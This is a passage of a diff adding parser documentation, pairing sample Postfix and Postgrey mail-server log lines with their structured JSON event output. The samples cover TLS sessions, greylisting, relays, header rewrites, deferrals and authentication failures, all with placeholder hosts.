"protocol": "smtp" + }, + "related": { + "hosts": [ + "EXAMPLE.PROD.OUTLOOK.COM", + "smtp.office365.com" + ], + "ip": [ + "40.101.136.242" + ] + }, + "source": { + "address": "EXAMPLE.PROD.OUTLOOK.COM", + "domain": "EXAMPLE.PROD.OUTLOOK.COM", + "registered_domain": "OUTLOOK.COM", + "subdomain": "EXAMPLE.PROD", + "top_level_domain": "COM" + } + } + + ``` + + +=== "wo_appname_postfix2.json" + + ```json + + { + "message": "01B3A96050: Used TLS for 10.19.65.1[10.19.65.1]:587", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "destination": { + "address": "10.19.65.1", + "domain": "10.19.65.1", + "ip": "10.19.65.1", + "port": 587 + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "10.19.65.1" + ], + "ip": [ + "10.19.65.1" + ] + } + } + + ``` + + +=== "wo_appname_postfix3.json" + + ```json + + { + "message": "023069605C: Used TLS for smtp.example.org[163.172.55.8]:25", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "destination": { + "address": "163.172.55.8", + "domain": "smtp.example.org", + "ip": "163.172.55.8", + "port": 25 + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "smtp.example.org" + ], + "ip": [ + "163.172.55.8" + ] + } + } + + ``` + + +=== "wo_appname_postfix4.json" + + ```json + + { + "message": "NOQUEUE: client=unknown[10.100.0.3]", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "destination": { + "address": "10.100.0.3", + "ip": "10.100.0.3" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "ip": [ + "10.100.0.3" + ] + } + } + + ``` + + +=== "wo_appname_postfix5.json" + + ```json + + { + "message": "warning: read TCP map reply from 127.0.0.1:10030: unexpected EOF (Operation now in progress)", + "event": { + "category": [ + "email" + ], + "reason": "unexpected EOF (Operation now in progress)", + "type": [ + "info" + ] + }, + "destination": { + "address": "127.0.0.1", + "domain": "127.0.0.1", + "port": 10030 + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "127.0.0.1" + ] + } + } + + ``` + + +=== "wo_appname_postfix6.json" + + ```json + + { + "message": "0A90996059: to=, relay=localhost[127.0.0.1]:10025, conn_use=3, delay=5.2, delays=0/0/0/5.2, dsn=2.0.0, status=sent (250 2.0.0 Ok: queued as 0BF0C9605C)", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "sent", + "outcome": "success", + "target": "network-traffic" + }, + "destination": { + "address": "mail2sms.smsbox.net", + "domain": "mail2sms.smsbox.net", + "ip": "127.0.0.1", + "port": 10025, + "registered_domain": "smsbox.net", + "subdomain": "mail2sms", + "top_level_domain": "net" + }, + "email": { + "to": { + "address": [ + "sms@mail2sms.smsbox.net" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "mail2sms.smsbox.net" + ], + "ip": [ + "127.0.0.1" + ] + } + } + + ``` + + +=== "wo_appname_postfix7.json" + + ```json + + { + "message": "proxy-accept: END-OF-MESSAGE: 250 2.0.0 Ok: queued as 7949396087; from= to= proto=ESMTP helo=", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "accept", + "outcome": "success", + "target": "network-traffic", + "type": "END-OF-MESSAGE" + }, + "destination": { + "address": "example.org", + "domain": "example.org", + "registered_domain": "example.org", + "top_level_domain": "org" + }, + "email": { + "from": { + "address": [ + "jdoe@example.org" + ] + }, + "to": { + "address": [ + "jane.doe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "example.org", + "mx.example.org" + ] + }, + "source": { + "address": "mx.example.org", + "domain": "mx.example.org", + "registered_domain": "example.org", + "subdomain": "mx", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_postfix8.json" + + ```json + + { + "message": "D2D459605C: Used TLS for smtp-in.example.com[5.6.7.8]:25", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "destination": { + "address": "5.6.7.8", + "domain": "smtp-in.example.com", + "ip": "5.6.7.8", + "port": 25 + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "smtp-in.example.com" + ], + "ip": [ + "5.6.7.8" + ] + } + } + + ``` + + +=== "wo_appname_postfix_cleanup1.json" + + ```json + + { + "message": "581B85F5B3: warning: header Content-Disposition: inline; filename=\"\"image018.png\"\"; size=162328;??creation-date=\"\"Thu, 11 Apr 2024 07:53:08 GMT\"\";??modification-date=\"\"Thu, 11 Apr 2024 07:53:08 GMT\"\" from local; from= to=", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "destination": { + "address": "example.com", + "domain": "example.com", + "registered_domain": "example.com", + "top_level_domain": "com" + }, + "email": { + "from": { + "address": [ + "jdoe@example.org" + ] + }, + "to": { + "address": [ + "jane.doe@example.com" + ] + } + }, + "file": { + "name": "image018.png", + "size": 162328 + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "example.com", + "example.org" + ] + }, + "source": { + "address": "example.org", + "domain": "example.org", + "registered_domain": "example.org", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_postfix_cleanup2.json" + + ```json + + { + "message": "59B835F5AD: warning: header Content-Disposition: attachment;??filename=\"\"=?utf-8?B?111111111111111111111111111111111111111111111111111111111111?=? =?utf-8?B?222222222222222222222222222222222222222222222222222222222222?=? =?utf-8? from local; from= to=", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "destination": { + "address": "example.com", + "domain": "example.com", + "registered_domain": "example.com", + "top_level_domain": "com" + }, + "email": { + "from": { + "address": [ + "jdoe@example.org" + ] + }, + "to": { + "address": [ + "jane.doe@example.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "example.com", + "example.org" + ] + }, + "source": { + "address": "example.org", + "domain": "example.org", + "registered_domain": "example.org", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_postfix_cleanup3.json" + + ```json + + { + "message": "EBA403F815: message-id=<74c99d8a-eb8b-4045-ae8e-6d3f6d51b41d@example.org>", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "message_id": "74c99d8a-eb8b-4045-ae8e-6d3f6d51b41d@example.org" + }, + "network": { + "protocol": "smtp" + } + } + + ``` + + +=== "wo_appname_postfix_no_spam_cleanup1.json" + + ```json + + { + "message": "000FA5FD8F: prepend: header From: John Doe from localhost[127.0.0.1]; from= to= proto=ESMTP helo=: X-NMFP-TRUST: TRUE", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "destination": { + "address": "example.com", + "domain": "example.com", + "registered_domain": "example.com", + "top_level_domain": "com" + }, + "email": { + "from": { + "address": [ + "jdoe@example.org" + ] + }, + "to": { + "address": [ + "jane.doe@example.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "example.com", + "smtp.example.org" + ], + "ip": [ + "127.0.0.1" + ] + }, + "source": { + "address": "smtp.example.org", + "domain": "smtp.example.org", + "ip": "127.0.0.1", + "registered_domain": "example.org", + "subdomain": "smtp", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_postfix_no_spam_cleanup2.json" + + ```json + + { + "message": "008BB5FD76: prepend: header From: =?UTF-8?q?Cellier_du_P=C3=A9rigord?=?? from localhost[127.0.0.1]; from= to= proto=ESMTP helo=: X-NMFP-TRUST: FALSE", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "destination": { + "address": "example.org", + "domain": "example.org", + "registered_domain": "example.org", + "top_level_domain": "org" + }, + "email": { + "from": { + "address": [ + "newsletter@wine.com" + ] + }, + "to": { + "address": [ + "jdoe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "example.org", + "smtp.example.org" + ], + "ip": [ + "127.0.0.1" + ] + }, + "source": { + "address": "smtp.example.org", + "domain": "smtp.example.org", + "ip": "127.0.0.1", + "registered_domain": "example.org", + "subdomain": "smtp", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_postgrey1.json" + + ```json + + { + "message": "action=greylist, reason=early-retry (10s missing), client_name=mx.example.org, client_address=1.2.3.4/32, sender=jdoe@example.org, recipient=jane.doe@example.com", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "reason": "early-retry (10s missing)", + "type": [ + "info" + ] + }, + "action": { + "name": "greylist", + "outcome": "success", + "outcome_reason": "early-retry (10s missing)", + "target": "network-traffic" + }, + "destination": { + "address": "example.com", + "domain": "example.com", + "registered_domain": "example.com", + "top_level_domain": "com" + }, + "email": { + "from": { + "address": [ + "jdoe@example.org" + ] + }, + "to": { + "address": [ + "jane.doe@example.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "example.com", + "mx.example.org" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "mx.example.org", + "domain": "mx.example.org", + "ip": "1.2.3.4", + "registered_domain": "example.org", + "subdomain": "mx", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_postgrey2.json" + + ```json + + { + "message": "action=greylist, reason=new, client_name=mx.example.org, client_address=1.2.3.4/32, sender=jdoe@example.org, recipient=jane.doe@example.com", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "reason": "new", + "type": [ + "info" + ] + }, + "action": { + "name": "greylist", + "outcome": "success", + "outcome_reason": "new", + "target": "network-traffic" + }, + "destination": { + "address": "example.com", + "domain": "example.com", + "registered_domain": "example.com", + "top_level_domain": "com" + }, + "email": { + "from": { + "address": [ + "jdoe@example.org" + ] + }, + "to": { + "address": [ + "jane.doe@example.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "example.com", + "mx.example.org" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "mx.example.org", + "domain": "mx.example.org", + "ip": "1.2.3.4", + "registered_domain": "example.org", + "subdomain": "mx", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_postgrey3.json" + + ```json + + { + "message": "action=greylist, reason=new, client_name=unknown, client_address=1.2.3.4/32, sender=jdoe@example.org, recipient=jane.doe@example.com", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "reason": "new", + "type": [ + "info" + ] + }, + "action": { + "name": "greylist", + "outcome": "success", + "outcome_reason": "new", + "target": "network-traffic" + }, + "destination": { + "address": "example.com", + "domain": "example.com", + "registered_domain": "example.com", + "top_level_domain": "com" + }, + "email": { + "from": { + "address": [ + "jdoe@example.org" + ] + }, + "to": { + "address": [ + "jane.doe@example.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "example.com", + "example.org" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "domain": "example.org", + "ip": "1.2.3.4" + } + } + + ``` + + +=== "wo_appname_postgrey4.json" + + ```json + + { + "message": "action=pass, reason=client AWL, client_name=mx.example.org, client_address=1.2.3.4/32, sender=jdoe@example.org, recipient=jane.doe@example.com", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "reason": "client AWL", + "type": [ + "info" + ] + }, + "action": { + "name": "pass", + "outcome": "success", + "outcome_reason": "client AWL", + "target": "network-traffic" + }, + "destination": { + "address": "example.com", + "domain": "example.com", + "registered_domain": "example.com", + "top_level_domain": "com" + }, + "email": { + "from": { + "address": [ + "jdoe@example.org" + ] + }, + "to": { + "address": [ + "jane.doe@example.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "example.com", + "mx.example.org" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "mx.example.org", + "domain": "mx.example.org", + "ip": "1.2.3.4", + "registered_domain": "example.org", + "subdomain": "mx", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_postgrey5.json" + + ```json + + { + "message": "action=pass, reason=client whitelist, client_name=mx.example.org, client_address=1.2.3.4/32, sender=jdoe@example.org, recipient=jane.doe@example.com", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "reason": "client whitelist", + "type": [ + "info" + ] + }, + "action": { + "name": "pass", + "outcome": "success", + "outcome_reason": "client whitelist", + "target": "network-traffic" + }, + "destination": { + "address": "example.com", + "domain": "example.com", + "registered_domain": "example.com", + "top_level_domain": "com" + }, + "email": { + "from": { + "address": [ + "jdoe@example.org" + ] + }, + "to": { + "address": [ + "jane.doe@example.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "example.com", + "mx.example.org" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "mx.example.org", + "domain": "mx.example.org", + "ip": "1.2.3.4", + "registered_domain": "example.org", + "subdomain": "mx", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_postgrey6.json" + + ```json + + { + "message": "action=pass, reason=triplet found, client_name=mx.example.org, client_address=1.2.3.4/32, sender=jdoe@example.org, recipient=jane.doe@example.com", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "reason": "triplet found", + "type": [ + "info" + ] + }, + "action": { + "name": "pass", + "outcome": "success", + "outcome_reason": "triplet found", + "target": "network-traffic" + }, + "destination": { + "address": "example.com", + "domain": "example.com", + "registered_domain": "example.com", + "top_level_domain": "com" + }, + "email": { + "from": { + "address": [ + "jdoe@example.org" + ] + }, + "to": { + "address": [ + "jane.doe@example.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "example.com", + "mx.example.org" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "mx.example.org", + "domain": "mx.example.org", + "ip": "1.2.3.4", + "registered_domain": "example.org", + "subdomain": "mx", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_postgrey7.json" + + ```json + + { + "message": "whitelisted: mx.example.org[1.2.3.4/32]", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "mx.example.org" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "mx.example.org", + "domain": "mx.example.org", + "ip": "1.2.3.4", + "registered_domain": "example.org", + "subdomain": "mx", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_postgrey8.json" + + ```json + + { + "message": "whitelisted: unknown[1.2.3.4/32]", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "network": { + "protocol": "smtp" + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + } + } + + ``` + + +=== "wo_appname_qmgr.json" + + ```json + + { + "message": "89BE920002: from=, size=152518, nrcpt=1 (queue active)", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "from": { + "address": [ + "test1@acme.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "acme.com" + ] + }, + "source": { + "address": "acme.com", + "domain": "acme.com", + "registered_domain": "acme.com", + "top_level_domain": "com" + } + } + + ``` + + +=== "wo_appname_qmgr2.json" + + ```json + + { + "message": "074955F67C: from=, size=4303, nrcpt=1 (queue active)", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "from": { + "address": [ + "bounce+41deb4.277afa-Heather.STEWART=corp.com@hrd.corp.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "hrd.corp.com" + ] + }, + "source": { + "address": "hrd.corp.com", + "domain": "hrd.corp.com", + "registered_domain": "corp.com", + "subdomain": "hrd", + "top_level_domain": "com" + } + } + + ``` + + +=== "wo_appname_queued.json" + + ```json + + { + "message": "CA9311112C08: to=, relay=srv.corp.com[1.1.1.1]:25, delay=8.4, delays=7.6/0/0.31/0.47, dsn=2.0.0, status=sent (250 2.0.0 Ok: queued as 4TwNdH5zwCz7fxV) 257", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "sent", + "outcome": "success", + "outcome_reason": "success", + "target": "network-traffic" + }, + "destination": { + "address": "1.1.1.1", + "domain": "srv.corp.com", + "ip": "1.1.1.1", + "port": 25 + }, + "email": { + "to": { + "address": [ + "f.lastname@corp.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "srv.corp.com" + ], + "ip": [ + "1.1.1.1" + ] + } + } + + ``` + + +=== "wo_appname_relay.json" + + ```json + + { + "message": "56E28C0007: to=, relay=1.1.1.1[1.1.1.1]:10025, delay=0.63, delays=0.57/0/0.05/0.01, dsn=2.0.0, status=sent (250 2.0.0 Ok: queued as DF82A21108)", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "sent", + "outcome": "success", + "outcome_reason": "success", + "target": "network-traffic" + }, + "destination": { + "address": "1.1.1.1", + "domain": "1.1.1.1", + "ip": "1.1.1.1", + "port": 10025 + }, + "email": { + "to": { + "address": [ + "rob@exemple.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "1.1.1.1" + ], + "ip": [ + "1.1.1.1" + ] + } + } + + ``` + + +=== "wo_appname_replace_header.json" + + ```json + + { + "message": "95BCC140E40: replace: header From: EXAMPLE <[hola@example.org](mailto:hola@example.org)>: From: [noreply@example.org](mailto:noreply@example.org)", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "from": { + "address": [ + "hola@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "postfix": { + "headers": { + "from": [ + "EXAMPLE <[hola@example.org](mailto:hola@example.org)>", + "[noreply@example.org](mailto:noreply@example.org)" + ] + } + }, + "related": { + "hosts": [ + "example.org" + ] + }, + "source": { + "address": "example.org", + "domain": "example.org", + "registered_domain": "example.org", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_replace_header_1.json" + + ```json + + { + "message": "95BCC140E40: replace: header From: Example Mailbox <[test@example.org](mailto:test@example.org)>: From: [noreply@example.org](mailto:noreply@example.org)", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "from": { + "address": [ + "test@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "postfix": { + "headers": { + "from": [ + "Example Mailbox <[test@example.org](mailto:test@example.org)>", + "[noreply@example.org](mailto:noreply@example.org)" + ] + } + }, + "related": { + "hosts": [ + "example.org" + ] + }, + "source": { + "address": "example.org", + "domain": "example.org", + "registered_domain": "example.org", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_replace_header_2.json" + + ```json + + { + "message": "2F46A140256: replace: header From: \"Example Help\" , orig_to=, relay=local, delay=0.05, delays=0.04/0.01/0/0, dsn=2.0.0, status=sent (delivered to mailbox)", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "sent", + "outcome": "success", + "target": "network-traffic" + }, + "destination": { + "address": "example.org", + "domain": "example.org", + "registered_domain": "example.org", + "top_level_domain": "org" + }, + "email": { + "to": { + "address": [ + "jdoe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "postfix": { + "orig_to": "foreman-proxy" + }, + "related": { + "hosts": [ + "example.org" + ] + } + } + + ``` + + +=== "wo_appname_smtp2.json" + + ```json + + { + "message": "1176E3F820: to=, orig_to=, relay=spamfilter, delay=3.3, delays=0.78/0/0/2.5, dsn=2.0.0, status=sent (delivered via spamfilter service)", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "sent", + "outcome": "success", + "target": "network-traffic" + }, + "destination": { + "address": "example.org", + "domain": "example.org", + "registered_domain": "example.org", + "top_level_domain": "org" + }, + "email": { + "to": { + "address": [ + "jdoe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "postfix": { + "orig_to": "dmarc@example.org" + }, + "related": { + "hosts": [ + "example.org" + ] + } + } + + ``` + + +=== "wo_appname_smtp3.json" + + ```json + + { + "message": "7B3643F820: to=, relay=127.0.0.1[127.0.0.1]:10025, delay=0.08, delays=0.03/0/0.01/0.05, dsn=2.0.0, status=sent (250 2.0.0 Ok: queued as 837B35FD17)", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "sent", + "outcome": "success", + "outcome_reason": "success", + "target": "network-traffic" + }, + "destination": { + "address": "127.0.0.1", + "domain": "127.0.0.1", + "ip": "127.0.0.1", + "port": 10025 + }, + "email": { + "to": { + "address": [ + "jdoe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "127.0.0.1" + ], + "ip": [ + "127.0.0.1" + ] + } + } + + ``` + + +=== "wo_appname_smtp4.json" + + ```json + + { + "message": "05BC43F81E: host mx.example.org[5.6.7.8] said: 421 4.3.0 Upstream error, please check https://example.com/email-routing/postmaster for possible reasons why. yrtPbwx4hZz2 (in reply to end of DATA command)", + "event": { + "category": [ + "email" + ], + "reason": "Upstream error, please check https://example.com/email-routing/postmaster for possible reasons why. yrtPbwx4hZz2 (in reply to end of DATA command)", + "type": [ + "info" + ] + }, + "destination": { + "address": "5.6.7.8", + "domain": "mx.example.org", + "ip": "5.6.7.8" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "mx.example.org" + ], + "ip": [ + "5.6.7.8" + ] + } + } + + ``` + + +=== "wo_appname_smtp5.json" + + ```json + + { + "message": "30D713F81F: host mx.example.org[5.6.7.8] said: 450 4.1.1 : Recipient address rejected: unverified address: Mailbox might be disabled, full, or may not exist on the server. Reason: JFE030050 (in reply to RCPT TO command)", + "event": { + "category": [ + "email" + ], + "reason": ": Recipient address rejected: unverified address: Mailbox might be disabled, full, or may not exist on the server. Reason: JFE030050 (in reply to RCPT TO command)", + "type": [ + "info" + ] + }, + "destination": { + "address": "5.6.7.8", + "domain": "mx.example.org", + "ip": "5.6.7.8" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "mx.example.org" + ], + "ip": [ + "5.6.7.8" + ] + } + } + + ``` + + +=== "wo_appname_smtp6.json" + + ```json + + { + "message": "connect to mx.example.org[5.6.7.8]:25: No route to host", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "destination": { + "address": "5.6.7.8", + "domain": "mx.example.org", + "ip": "5.6.7.8", + "port": 25 + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "mx.example.org" + ], + "ip": [ + "5.6.7.8" + ] + } + } + + ``` + + +=== "wo_appname_smtp_connection3_timed_out.json" + + ```json + + { + "message": "connect to mail.corp.com[1.1.1.1]:25: Connection timed out 125", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "destination": { + "address": "1.1.1.1", + "domain": "mail.corp.com", + "ip": "1.1.1.1", + "port": 25 + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "mail.corp.com" + ], + "ip": [ + "1.1.1.1" + ] + } + } + + ``` + + +=== "wo_appname_smtp_relay.json" + + ```json + + { + "message": "96887C0006: to=, relay=exemple.com[1.1.1.1]:25, delay=354776, delays=354775/0/0.9/0.16, dsn=4.3.1, status=deferred (host exemple.com[1.1.1.1] said: 452 4.3.1 Insufficient system storage (in reply to MAIL FROM command))", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "deferred", + "outcome": "success", + "outcome_reason": "The recipient`s mail server is experiencing a Disk Full condition", + "target": "network-traffic" + }, + "destination": { + "address": "1.1.1.1", + "domain": "exemple.com", + "ip": "1.1.1.1", + "port": 25 + }, + "email": { + "to": { + "address": [ + "rob@exemple.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "exemple.com" + ], + "ip": [ + "1.1.1.1" + ] + } + } + + ``` + + +=== "wo_appname_smtpd1.json" + + ```json + + { + "message": "021C03F820: filter: RCPT from mx.example.org[192.168.100.124]: : Client host triggers FILTER smtp:[127.0.0.1]:10025; from= to= proto=ESMTP helo=", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "destination": { + "address": "example.com", + "domain": "example.com", + "registered_domain": "example.com", + "top_level_domain": "com" + }, + "email": { + "from": { + "address": [ + "jdoe@example.org" + ] + }, + "to": { + "address": [ + "jane.doe@example.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "example.com", + "mx.example.com" + ], + "ip": [ + "192.168.100.124" + ] + }, + "source": { + "address": "mx.example.com", + "domain": "mx.example.com", + "ip": "192.168.100.124", + "registered_domain": "example.com", + "subdomain": "mx", + "top_level_domain": "com" + } + } + + ``` + + +=== "wo_appname_smtpd2.json" + + ```json + + { + "message": "lost connection after BDAT from mx.example.org[192.168.100.124]", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "lost connection", + "outcome": "success", + "target": "network-traffic", + "type": "BDAT" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "mx.example.org" + ], + "ip": [ + "192.168.100.124" + ] + }, + "source": { + "address": "mx.example.org", + "domain": "mx.example.org", + "ip": "192.168.100.124", + "registered_domain": "example.org", + "subdomain": "mx", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_smtpd3.json" + + ```json + + { + "message": "warning: hostname mx.example.org does not resolve to address 5.6.7.8: Name or service not known", + "event": { + "category": [ + "email" + ], + "reason": "Name or service not known", + "type": [ + "info" + ] + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "mx.example.org" + ], + "ip": [ + "5.6.7.8" + ] + }, + "source": { + "address": "mx.example.org", + "domain": "mx.example.org", + "ip": "5.6.7.8", + "registered_domain": "example.org", + "subdomain": "mx", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_smtpd4.json" + + ```json + + { + "message": "warning: mx.example.org[192.168.100.132]: SASL LOGIN authentication failed: authentication failure, sasl_username=john.doe@exmaple.org", + "event": { + "category": [ + "email" + ], + "reason": "SASL LOGIN authentication failed: authentication failure, sasl_username=john.doe@exmaple.org", + "type": [ + "info" + ] + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "mx.example.org" + ], + "ip": [ + "192.168.100.132" + ] + }, + "source": { + "address": "mx.example.org", + "domain": "mx.example.org", + "ip": "192.168.100.132", + "registered_domain": "example.org", + "subdomain": "mx", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_smtpd_connection.json" + + ```json + + { + "message": "lost connection after AUTH from unknown[1.1.1.1]", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "lost connection", + "outcome": "success", + "target": "network-traffic", + "type": "AUTH" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "ip": [ + "1.1.1.1" + ] + }, + "source": { + "address": "1.1.1.1", + "ip": "1.1.1.1" + } + } + + ``` + + +=== "wo_appname_smtpd_connection2.json" + + ```json + + { + "message": "connect from unknown[10.1.1.1] 88", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "connect", + "outcome": "success", + "target": "network-traffic" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "ip": [ + "10.1.1.1" + ] + }, + "source": { + "address": "10.1.1.1", + "ip": "10.1.1.1" + } + } + + ``` + + +=== "wo_appname_smtpd_tls.json" + + ```json + + { + "message": "Trusted TLS connection established from mail.outbound.protection.outlook.com[1.1.1.1]: TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "mail.outbound.protection.outlook.com" + ], + "ip": [ + "1.1.1.1" + ] + }, + "source": { + "address": "mail.outbound.protection.outlook.com", + "domain": "mail.outbound.protection.outlook.com", + "ip": "1.1.1.1", + "registered_domain": "outlook.com", + "subdomain": "mail.outbound.protection", + "top_level_domain": "com" + } + } + + ``` + + +=== "wo_appname_smtpd_tls2.json" + + ```json + + { + "message": "Trusted TLS connection established to mx.corp.com[1.1.1.1]:25: TLSv1.3 with cipher TLS_AES_128_GCM_SHA256 (128/128 bits) key-exchange X25519 server-signature RSA-PSS (2048 bits) server-digest SHA256", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "destination": { + "address": "1.1.1.1", + "domain": "mx.corp.com", + "ip": "1.1.1.1", + "port": 25 + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "mx.corp.com" + ], + "ip": [ + "1.1.1.1" + ] + } + } + + ``` + + +=== "wo_appname_smtpd_tls3.json" + + ```json + + { + "message": "Trusted TLS connection established to 127.0.0.1[127.0.0.1]:10025: TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits) key-exchange X25519 server-signature RSA-PSS (2048 bits) server-digest SHA256 201", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "destination": { + "address": "127.0.0.1", + "domain": "127.0.0.1", + "ip": "127.0.0.1", + "port": 10025 + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "127.0.0.1" + ], + "ip": [ + "127.0.0.1" + ] + } + } + + ``` + + +=== "wo_appname_spamd1.json" + + ```json + + { + "message": "spamd: result: . -1 - DKIM_SIGNED,DKIM_VALID,DKIM_VALID_AU,HEADER_FROM_DIFFERENT_DOMAINS,HTML_MESSAGE,SPF_HELO_NONE,SPF_PASS,T_KAM_HTML_FONT_INVALID 